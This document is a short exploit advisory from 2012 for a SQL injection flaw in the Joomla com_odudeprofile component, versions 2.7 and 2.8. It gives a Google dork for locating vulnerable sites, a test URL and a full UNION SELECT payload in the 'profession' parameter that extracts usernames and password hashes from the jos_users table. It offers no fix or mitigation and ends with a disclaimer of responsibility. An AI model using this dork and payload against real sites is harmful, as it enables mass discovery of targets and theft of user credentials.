______________________________________________________________________________________
 
 Exploit Title: Joomla com_odudeprofile V2.x Exploit

 Google Dork: inurl:index.php?option=com_odudeprofile

 Date: [24-07-2012]

 Author: Daniel Barragan "D4NB4R"

 Twitter: @D4NB4R

 site: http://poisonsecurity.wordpress.com/

 Vendor: http://www.odude.com

 Version: 2.7 & 2.8

 Download: http://www.odude.com/home/profile.html

 License: Non-Commercial
 
 Tested on: [Linux(arch)-Windows(7ultimate)]

______________________________________________________________________________________

  Test:

  http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=idtrue%27

    
  Sql:

  http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=(SQL) 


      DEMO1:

                     http://example.com/index.php?option=com_odudeprofile&view=search&profession=999999.9'%20union%20all%20select%20 0x31303235343830303536%2C(select%20concat(username,0x3D,password)%20from%20jos_users)%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R%20


     


Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"